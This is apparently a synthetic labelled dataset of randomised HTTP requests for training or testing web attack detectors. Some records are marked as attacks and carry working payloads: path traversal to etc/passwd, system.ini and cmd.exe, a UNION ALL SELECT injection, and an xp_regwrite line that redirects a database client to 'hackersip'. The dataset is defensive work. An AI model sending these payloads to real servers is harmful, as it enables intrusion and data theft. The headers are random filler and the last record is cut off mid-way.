If-Match: "7sjLF_fk51649EXcRxNv"
If-None-Match: *
If-Range: "zpZKchUcrZfqXH8F1"
Max-Forwards: 46
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: NTLM NHRiZHJzb29Tc25lbnkzZG9lYWFKcmxlc2lyaXR0ZWV0bmFvc2Nhdg==
Authorization: Basic eWNndGFhbzpnZGlhdmNl
Range: 0-8818,879-
Referer: http://www.axmgsba.org/dii9/nNoa/Ecwlt/rAdv7ae.swf
TE: gzip;q=0.7,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: rI@Q7RbM http://www.eerillt.net
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: 7.4 www.i2nTat2r.html, HTTP/4.9 www.Ylwheieh.tiff
Transfer-Encoding: w9Eoe
Upgrade: iqeeh/8.0, lpstrb/3.7, 0ddrat/0.4, ieq/2.7, n5pdk/3.6
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26637
Start - Id: 7382
class: Valid
POST /spDcoigRrAP5FE/0Y9div/atp705byt7Ab/rgnApNodtwhtoNrfnr.html? HTTP/1.0
Content-Length: 220
Content-Language: nttiTe
Content-Encoding: gzip
Content-Location: /asaht/vLren/aecri30/twrhi.mpg
Content-MD5: MHVhbGVpc3NDZWVsY3E3Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Apr 08 11:22:34 GMT
Last-Modified: Fri, 04 Dec 09 10:10:04 GMT
Host: www.hedh7t.de:5637
Connection: keep-alive
Accept: text/*;q=0.6, application/postscript
Accept-Charset: iso-8859-15;q=0.6, iso-8859-5;q=0.8, us-ascii, x-mac-roman, windows-874
Accept-Encoding: 
Accept-Language: sotb3OF-nene;q=0.0
Cache-Control: neel5l=dorrr
Client-ip: 167.163.244.45
Cookie: 4aFn=4286023
Cookie2: $Version="61"
Date: Fri, 05 Nov 04 12:23:34 GMT
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: xastsswn=l3tnnlNx
From: coe5re@9jhe.fr
If-Modified-Since: Tue, 23 Oct 07 18:45:16 UTC
If-Unmodified-Since: Mon, 24 Apr 06 17:51:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 336
MIME-Version: 5.7
Pragma: r='iEiywCsj'
Proxy-Authorization: gaaa vnea76h=weploni
Authorization: Digest opaque="eo5t"
Range: 253426-5
Referer: http://oeEei.com/Setu.jpg
TE: gzip,trailers
Trailer: Pragma
User-Agent: hhd7 (qJzXE@e; iDlgdwj)
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 850x401
Via: eis/3.1 168.245.88.248
Transfer-Encoding: aea1jg
Upgrade: pst/9.7, oub/7.2
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 47.72.36.31
X-Serial-Number: 557256998518
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

5aiihtmf4m=05nu9varoroe6t&tup0oMnkd19moif=itgmrIao&Ddrja=8186&deYssrc=sirw&am=bt i&waDIshtr5taz=nkN_xg@.X&tw=5166904&s0cearekrTlsas=]nor&ie3atmn=rlu3u3s2hwftN&mlccatrafu=31769372&FQ1NZUseRservices4=06&hQyqk=nofirtate

End - Id: 7382
Start - Id: 45798
class: PathTransversal
GET /rdqiraNDtus6nlnUtnbt/oandI3LO_/rioMrtumCs3trs/ndaNw30nTqcUD/rtt1dolg3stwdwaa2/rrPixKY6N/enmu9mirdca/rudd5is.css?hdlEgcq=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&MSMJgL=0j&Epntyrsgtsa5e=oixsttnT HTTP/1.1
Host: www.ptuht8e0.de
Connection: close
Accept: text/*;q=0.4, video/*, image/jpeg;q=0.4
Accept-Charset: iso-8859-8-i, iso-8859-8
Accept-Encoding: 
Accept-Language: eio8nb9-f;q=0.0
Cache-Control: no-transform
Client-ip: 89.136.143.100
Cookie: ntz7oi0s0m==s =y;rt=yOPz_;ahtemhnstos=e-ZnPrN;xZTYuH.YnetcatselectTh=eoo
Cookie2: $Version="28"
Date: Wed, 06 Jun 07 22:36:14 CET
ETag: "sOmlprG1RquyFJwp"
Expect: tsoln3r=7idtmA
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: "lN4y2yoNZjxbveeM5G"
If-None-Match: *
If-Range: Sun, 14 Jan 07 15:57:04 CET
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ckh0ejB0a2F0aTduaXR2bHNpdG13dG9zNXJsYmxyZnk=
Authorization: Digest qop=bEneli
Range: 151606-
Referer: /h1akzdb/qfoae/ehtssjTu.php3
TE: trailers
Trailer: Accept-Language
User-Agent: acq9cafr
UA-CPU: x86
UA-Disp: 1489,7899,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9422x259
Via: 4.9 www.orxmrrt.jpeg:820
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 71.201.98.2
X-Serial-Number: 06918680418533
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45798
Start - Id: 34363
class: Valid
PUT /Tmsc0e/vRkG.H/tiXiq/sPQRCIMqA/de6WEptq2IEzJ7V1Cs/5ddG4qcmd0zow/aufG8X@AgC0j03/tee8aiagtdta/eoaoiearytdbhppi4/rytgdroous.gif? HTTP/1.1
Content-Length: 301
Content-Language: sg,0a
Content-Encoding: gzip
Content-Location: /feacoan/eQvo1/r93sf/osoln/AeoRtks8.php4
Content-MD5: YWFyeWxscnhhOGFhdGVhdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Feb 10 11:51:07 GMT
Last-Modified: Sun, 14 Mar 10 22:19:56 CET
Host: 31.156.250.76
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 236.235.183.17
Cookie: i3=O$i
Cookie2: $Version="527"
Date: Sun, 10 Feb 08 12:32:47 CET
ETag: "Jbe.7Cnz-Xo5NknhWt7"
Expect: 100-continue
From: lroe@j5dnTa1qd.biz
If-Modified-Since: Wed, 28 Jun 06 24:36:26 UTC
If-Unmodified-Since: Thu, 20 Jan 05 22:40:53 UTC
If-Match: "Jf9EZkcC0Mx25GsmTlo"
If-None-Match: *
If-Range: Mon, 11 Jul 05 05:52:35 UTC
Max-Forwards: 8
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: NTLM cHI0b3l6MzRlb245ZHJiTml0dGVpTm1ucjNjbGlsZXN0aE92cmZhaXRubDJoaQ==
Range: 2495-218225,-34
Referer: /drdosge/6tqndeq.nsf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: iwjn (aSOpmB7e; 4hmypeZ08m; eUB.cgF)
UA-CPU: Sparc
UA-Disp: 6654,1299,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 015x732
Via: HTTP/7.1 162.191.4.131:9337
Transfer-Encoding: deflate
Upgrade: eoutbj/8.4, dau/7.9, Igo/3.3, ugequ/9.4
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~

eOszosmtgky1o=4BqdkW&niodearstgtui=likei&aser=9441&yetumc4eH=e@BXQ2@FsLP&yanPethelnqp=goat&CB3q3etcp=mdocumentBal&cfyBG8A=262100877&ieahioyt=629962&c4h8dsl=982114&eleoruiAt=o+sxmlsyrcpopensfeaGaRU[d&hraetieR0ehhtA=831968&hwTteg=o5l74BLxls&eqaDads1nt=m6lb~aoteeas&usedeA=sea&oitelOvhceSpm=383

End - Id: 34363
Start - Id: 35033
class: SqlInjection
PUT /rfrixe/vfbmaiR3Qa/amoAomh/iimoa7ydn8/sg0.e/e2d/t0.jpeg? HTTP/1.1
Content-Length: 401
Content-Language: 3pcsnkgs
Content-Encoding: compress
Content-Location: /endeuhs/apsrmse/bdnk/ehaTanr/lbndaa.txt
Content-MD5: bWU1aWpsc2x2dXN1a2llbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Feb 10 01:32:26 CET
Last-Modified: Wed, 24 Sep 08 17:19:49 UTC
Host: 40.108.168.236
Connection: close
Accept: video/mpeg;q=0.4, text/xml;q=0.6, text/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: 6i2=0enerLn
Client-ip: 194.197.22.178
Date: Fri, 06 Aug 04 07:08:33 UTC
ETag: "KS65qG-WKNityL8JU"
Expect: 100-continue
If-Modified-Since: Sun, 21 Nov 04 23:45:06 GMT
If-Unmodified-Since: Thu, 03 Feb 05 10:38:45 GMT
If-Match: "mFQjyD86fLq3JNF8J"
If-None-Match: *
If-Range: "lGTO.4Y0@PpUcnFk1VI"
Max-Forwards: 0916
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bmlwdjoxMGZhdQ==
Authorization: rxeiwt mmee=mSaioiaf
Referer: /tiesine/SrlERRio/bnhrHyto/mkRae/etlweih.rar
TE: chunked
User-Agent: sbr5ZOL http://www.Bela.cz
UA-CPU: 68000
Via: 6.5 93.187.89.26:23555, hi5ea/3.6 47.93.100.23
----: --------------------

uaithirrsao=aeyhtpassNn &-PGwindow.opens=943689&04gdopUw=niberya&ntaaNhdhi=hnkacmoeap&0tten0ucv8=ejtdJFap@.&soS9ueh=5ewnxp_Ie&sOguIee=exec   xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','OeNe','REG_SZ','DBMSSOCN,hackersip,80'&rneeTiiw=6&t1T8FsamrjXk=sIMEkFAXm8&co=854500&XzuDOvJtelnetP=:tfromuor&nmnhtmpscript=g7FTl_DcI

End - Id: 35033
Start - Id: 41526
class: SqlInjection
POST /ERahnrmO/u6hSDTMZQj/oaEluoaaN3/hjuPXGJXju/5thlwoa/etssaicsddodn/raAQWsm5/yisoUbcis/eresde9/n15c6dy/scncce2doreringO/Q4OickHXoty8mI.cgi? HTTP/1.0
Content-Length: 322
Content-Language: cVh1
Content-Encoding: deflate
Content-Location: http://www.sles.fr/eetr3.msf
Content-MD5: dGFlYW4yNGdpMXdtckpvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 26 Feb 09 19:12:26 UTC
Last-Modified: Fri, 04 Jun 04 19:23:35 UTC
Host: 0.206.163.130
Connection: close
Accept: application/x-tar;q=0.0, application/*, application/x-tar
Accept-Charset: iso-8859-2;q=0.3, iso-8859-2;q=0.3, x-mac-turkish
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 17.229.40.102
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="76"
Date: Sat, 28 Mar 09 02:43:42 GMT
ETag: W/"bX0Vg3Kd8@oR3w41"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Mon, 18 Oct 04 04:07:12 UTC
If-Unmodified-Since: Mon, 16 Oct 06 24:53:42 UTC
If-Match: "DYUrs8Juq4sgn3LTn"
If-None-Match: *
If-Range: "zmIakQ3LrF_GoqfE"
Max-Forwards: 528
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: NTLM aXJ5OGV2b2Vvb3JzeWlvdGFpNXJtbkVpbnM3ZUV0bGRsd29jc2RpZWF0
Range: 911566-290,4666-98
Referer: /apm8a.jsp
TE: gzip
Trailer: User-Agent
User-Agent: eNr3egn9E (bzENBAs1IL; aZ@@7xrr3; dpvaD6Y6; tZM5sy; ajM_PyB-x)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: hxcmla/9.5 www.gisv.js, 9.8 207.0.249.91:998
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

ueeaeas=-e&pszy3ufAzG.e='  )   UNION  ALL  SELECT     sgdh     , htdtwew ,   eqasg  FROM eu WHERE    nOaicieyet NOT IN ( 'bznaocsTn'    )     AND     s6Osoohf5 NOT     IN    (    'taev8tn2rD'    )     AND   ''  =   '&P3-EtreplaceIFOU9=relieohanei91ch&L0@O1Q=eOnd1popeposition'&nc6nng=3Enr

End - Id: 41526
Start - Id: 11438
class: Valid
GET /o9gEjz3aT5Yyb/1yO/jtecli/xaaR/ccC7eh5tLxskoN/noIsxmce/taIaW0_oOv/6iw10HTBCP8dH/3sos7iowDdoeuuto/kah6Y1sg/5raauYmncrhsilamet.gif?vDNTQk2b=dabin3rtwCshutdown&elrrqnttdso=tlSBo&cdesdkaNo=refiRazhcl&mpusFirsXde=gajodrst&ahmUt=1326&huets5tibnse=inullyaehtb%40%3Cinputdirm%27my&nocrowupuda=rFKzDUP_uFtz&anAcblhGtett=stdinty&QthEKGhyVlink=70e%2B&Ij5HuGselectICIl=tesock_stream HTTP/1.1
Host: www.6yOeAoe.gov:80
Connection: 9myny
Accept: image/*, application/rtf
Accept-Charset: iso-8859-8-i, windows-1251, koi8-r, x-mac-chinesesimp, x-mac-chinesesimp;q=0.8
Accept-Encoding: 
Accept-Language: SFallyh-a04oh
Cache-Control: no-cache
Client-ip: 212.244.209.81
Cookie: elwwkevl=:Lnc;icadr=60;mgroup byEO_h5kK.@=nx4;acthTsta2shb2=37200035;ouenIaae=8931809;t53ta4lts=rcIhscrAsa
Cookie2: $Version="19"
Date: Thu, 12 Jun 08 13:37:10 UTC
ETag: W/"egMQWZwl9wS4TZIP4MU_"
Expect: 100-continue
From: iurd@huAteuSsi.be
If-Modified-Since: Thu, 23 Mar 06 06:58:06 GMT
If-Unmodified-Since: Fri, 20 Jul 07 19:50:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Nov 09 02:16:20 CET
Max-Forwards: 96
MIME-Version: 0.2
Pragma: lmhrWr6=1rlo
Proxy-Authorization: u68si atohazra=reig
Authorization: Basic ZWFleTo2cGZpZQ==
Range: 17-873364,-1915
Referer: http://lzgnd4.gov/rdwlr6/epogl/4oirA/tzAniyt.mpg
TE: trailers,chunked,chunked;q=0.2
Trailer: From
User-Agent: jz8jpT (dNrNaDIW; i6zLqN; o5k5@Xg8Ob; vIPTD2UJzo; s7I9z.p)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1385x852
Via: 6.1 www.ed7t.tiff:650, 7.1 34.110.25.169, HTTP/3.7 212.137.227.68
Transfer-Encoding: compress
Upgrade: elees/2.8
Warning: 568 211.231.110.107 "4fnct2o" 
X-Forwarded-For: 40.167.68.225
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11438
Start - Id: 28190
class: Valid
GET /rayegmzT2nrnmsphflta/uKAZrq_xVwzd@ot_@4/fbrzdhohksnfltRacapc/dZE/rwlydmkuhl/5mDtoH0iS.php4?xzmbeh=llns&dse7e=9592733797&9WxDc6Xboot.iniUrD=inslrsa7%27mnpassthrulcmd6tsx&eeeisgstRilyd=tehuaeLe5Ee3eate&5h6m=we&t9xNt5nt=8&eijenoe=il%3F&z9sEphpKHSkMc=60678 HTTP/1.0
Host: www.Agneve.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: cogttx='hepTgd'
Client-ip: 140.141.64.90
Cookie: lonqoeIae6njh=628194;ehDrieemR=2b@TvP@wup;smtnde7ECose=07;GidstoSvyn=70217795;mlhiEfswsixxn=26409520;nullcKfvscriptvxSrm1xterm=738097
Cookie2: $Version="808"
Date: Fri, 29 Jun 07 14:18:42 UTC
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Sun, 16 Mar 08 11:01:15 CET
If-Unmodified-Since: Thu, 22 Apr 10 08:50:12 CET
If-Match: *
If-None-Match: "ZmxW-M0M5dHBfH5HT"
If-Range: "FO2bi@mhpNrvBJbR"
Max-Forwards: 54
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM M3I0RWxoZW9hYnZzbndvZXl1Tm53dG5DbnJlY2xpMmN5YnJzZTBlc2hv
Range: -569,-376,5-
Referer: /TEpX/kStl/umrniS/gaeLat.php4
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 6.5; xE-en; rv:6.5.6) Gecko/65901793
UA-CPU: MIPS
UA-Disp: 0207,3028,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x735
Via: 9.3 74.218.204.210, 6.5 www.cf5nre6.jpg, 4.3 www.26aa.jpg:5
Transfer-Encoding: gzip
Upgrade: sse7/8.3, nhtR8u/1.0, lwewrt/4.6, hgvtE/7.5
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28190
Start - Id: 25395
class: Valid
GET /iektep/jT7x9DSOCS.php? HTTP/1.1
Host: 131.168.250.30:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 45.139.165.17
Cookie: v-t_7adminhttpsy.htaccesI=5;tctkmldneNw= 5a[D4lstym;bE8hv=pe7U7assiic8m7ov;e26yeusbiOrhp=tfXVC;len6ooSl1einnz=[u aaiexmlt4 i
Cookie2: $Version="522"
Date: Sun, 25 Apr 04 20:20:38 GMT
ETag: "E-9XHayZY1Yw33u"
Expect: 100-continue
From: drrovE@debi2e.fr
If-Modified-Since: Mon, 30 Mar 09 05:16:09 CET
If-Unmodified-Since: Tue, 18 Nov 08 18:57:51 CET
If-Match: "pAPGMmhZ.1CJQgbHO4_"
If-None-Match: *
If-Range: Fri, 06 Feb 04 01:29:29 CET
Max-Forwards: 0741
MIME-Version: 9.0
Pragma: 94aO=tec4t
Proxy-Authorization: NTLM eGxhbGxibGFwbmFzWGljcnNpaXB0ZTNzZGxzbmhuT2VzYXN0M2hybWI=
Authorization: Basic bHJFZWVUOmhhQXJl
Range: 7820-,350834-024
Referer: /5limtoSn/iocon/z4lIinuF/omla.mdb
TE: trailers,chunked;q=0.8
Trailer: Accept
User-Agent: Mozilla/5.4 (X11; U; Linux i586 0.6; bE-dq; rv:9.9.5) Gecko/64397335
UA-CPU: x86
UA-Disp: 071,871,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 407x092
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: identity
Upgrade: aer/3.2, cuxRP7/3.1, tvea/5.6, A3e/4.9
Warning: 569 www.t4X4iede.htm "7eueo" "Fri, 30 Apr 10 03:41:56 CET"
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 06104
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25395
Start - Id: 3321
class: Valid
GET /rm/nuhj4ieqcnCbhd/zFJvWd04def/r-YUr.BHbpc/eFj/sqszGK_ktrSO3q/oxIZQ5/agC-nlY4c/tnnjppeednfrti.aspx?zOhOdhe=rea%7C7%3CZrntlecho%27d HTTP/1.0
Host: www.hkfin.gov
Connection: odeea
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, identity;q=0.6, compress, deflate
Accept-Language: *
Cache-Control: max-age=47
Client-ip: 64.110.122.85
Cookie: YhEHimetahttplaTuS=eR$;B7fsty4sidi=Piehoeo;varB0passthru.w@=snrmaili;hpn1aeoFoDhrsZh=eonytfaoiern;Cllii3aet5uefi=4U
Cookie2: $Version="250"
Date: Fri, 08 Oct 04 17:15:31 GMT
ETag: "paDHnIejMS2J61TqP"
Expect: wd2e
From: ieec@Aw8rhen.st
If-Modified-Since: Thu, 12 Apr 07 21:27:26 CET
If-Unmodified-Since: Wed, 27 Apr 05 07:23:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Oct 07 01:48:59 UTC
Max-Forwards: 09
MIME-Version: 4.9
Pragma: oaeeyalU=hvaEiehr
Proxy-Authorization: il3tu1 yhotudi=ettauin
Authorization: Basic YnRkeWFhRTpBZXRuYW8=
Range: 715429-,64862-,731-870612
Referer: http://www.rdmhrO.st/urrae4o.sh
TE: deflate;q=0.1,trailers,deflate
Trailer: Expect
User-Agent: Mozilla/2.4 (X11; U; SunOS sun4u 6.1; e9-rh; rv:6.2.9) Gecko/68025514
UA-CPU: MIPS
UA-Disp: 517,125,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 701x9468
Via: 9.8 www.blfa.jpg, 6.9 152.124.62.72, vste/7.5 33.209.92.232
Transfer-Encoding: gzip
Upgrade: e7H/3.8
Warning: 102 www.eipsn.js "e5Ie" 
X-Forwarded-For: 72.237.241.25
X-Serial-Number: 2391844850993
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3321
Start - Id: 32467
class: Valid
GET /lUpbFUB/o-xx/tE/f3zHe310/daSrgthbgibne/asyWnynetg6hai/zoCzMj75SGv/seoeluaeieemkkimudv/1ahtoesfveacufaepnr.jpeg?hLhNC-i=eXoaGZbO1&nuwanharhyonn=e2a0fee&8wjaeu=istm&eepceeal6ifiaie=m2ssw%280&w5oq=oyHjZk8AnH0&easaeocz2et=eGrQW_W&nwwee5z1dw=hbpOdezcdelete%28tztr0%3Be&tt=399&ADWCkT=l%25Rttloj%25kcppk8t+ HTTP/1.0
Host: 31.223.230.146
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate;q=0.5, compress, gzip;q=0.7
Accept-Language: *;q=0.2
Cache-Control: min-fresh=8435
Client-ip: 93.135.40.113
Cookie: SsYi=rn;tonsadetf=es2;6hlthnl=ixno;a2EoFjsZOs=rDCHzQsFI_w;Shlto=58000;hertrrcawtofIu=sIT
Cookie2: $Version="9"
Date: Mon, 12 Jun 06 11:49:00 UTC
ETag: W/"Phb_CuN3CBeWzEnJ0F"
Expect: 100-continue
From: gmteT8ev@mrqx3tteu.net
If-Modified-Since: Sun, 18 Apr 04 11:17:52 CET
If-Unmodified-Since: Wed, 23 Nov 05 22:17:46 UTC
If-Match: *
If-None-Match: "B-QZbiQ-l5eCZ9R6nl"
If-Range: *
Max-Forwards: 598
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: 3essmH teen=haeni4
Authorization: NTLM YWFnd2Fsd2d0ZXhOdGVycm90UzhlYWF0dFB1cDJlbmFndHVXZGE=
Range: -5092,565429-
Referer: http://www.rewdai.be/efoegn8e.jsp
TE: chunked;q=0.6,deflate
Trailer: Expect
User-Agent: ra58ztmr/6.3.1.5
UA-CPU: MIPS
UA-Disp: 1956,0325,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x3717
Via: HTTP/0.8 www.ilaayet.html, FTP/1.9 www.cnxsrlt.html
Transfer-Encoding: gzip
Upgrade: ternt/2.2, gvhrO/1.0, 2n4E3h/6.6, 5tnucz/1.4, tsojiD/3.4
Warning: 562 108.253.133.99 "oeOnE" "Mon, 26 Oct 09 02:37:57 GMT"
X-Forwarded-For: 171.216.17.6
X-Serial-Number: 31593732
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32467
Start - Id: 46356
class: PathTransversal
GET /vTsjOp7wQOJHNom/oD/I5eI0/rwUd/gAadEletktR/6G9ivOnp4kcDZ3dqh/9nrwta5ygis/iWlk9GOviIRTPo.JmcfJ/Nrolte1.shtml?n2mo=rYjUku&8n=2164677&lxtfcnptsmb=658&iCapestS=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&iV7R1kXhavingpassthruZ=wyKMqc73&FFbgsoundH3xuqzrB=0ees HTTP/1.1
Host: www.wbeih.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.0
Accept-Encoding: identity;q=0.9, identity, deflate;q=0.3, identity;q=0.1
Accept-Language: 9hece-ffmNii;q=0.0, a9a-horsrn, lenresIg-5amzmp, e-1teud
Cache-Control: otl='snerrau'
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="19"
Date: Sun, 26 Apr 09 07:16:06 GMT
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: aitsn
From: dB62@isuoongs1.org
If-Modified-Since: Thu, 25 Dec 08 09:58:03 UTC
If-Unmodified-Since: Sun, 10 Feb 08 14:41:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 610
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: elhe msassr=mfoj
Authorization: Digest response="B5d1b5Eee005A9e34C791549c23070cD"
Range: 405245-17797
Referer: http://measo.gov/neiifr.nsf
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: uaAtaezw/8.0.2.5.7
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 3.0 www.ttaliI1q.js, HTTP/1.3 www.rhix.js, u6z/1.6 153.162.166.154:62
Transfer-Encoding: deflate
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 234 110.129.128.228 "sXh8eakqt" "Wed, 04 Jun 08 13:47:32 GMT"
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46356
Start - Id: 44117
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 7.144.237.151:64
Connection: irqrr
Accept: image/gif, image/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: xiea-o;q=0.6, o-eoE;q=0.6, 0knVeu-nwrtc, ov-pobe, ht7aee-4n
Cache-Control: min-fresh=4251
Client-ip: 249.225.32.40
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="15"
Date: Wed, 12 Sep 07 14:39:45 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: edi6llee@iwIc9.ch
If-Modified-Since: Wed, 31 Jan 07 20:22:15 GMT
If-Unmodified-Since: Sat, 27 Mar 04 17:50:11 UTC
If-Match: "w8jIW-yi4JTTJv17."
If-None-Match: *
If-Range: Sat, 14 Apr 07 01:02:35 GMT
Max-Forwards: 82
MIME-Version: 5.1
Pragma: n='welFm'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 6-5561
Referer: /fiwbyeg/pernbwSs/Rwln/iLc8oigm/fhcrato.jsp
TE: trailers,gzip
Trailer: Date
User-Agent: 0gdephrtidSraDa
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44117
Start - Id: 17828
class: Valid
GET /pE__e/aHqm1YJHvT3z2V@cXS@.aspx?ttjNeayegahp1=5%7Ctaohweanr&kFrtev3h=otoBobeetw HTTP/1.0
Host: 114.27.234.248
Connection: lfcptd
Accept: image/*, image/png;q=0.8, text/xml;q=0.2
Accept-Charset: windows-1258;q=0.8, iso-8859-7;q=0.4, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 140.241.89.162
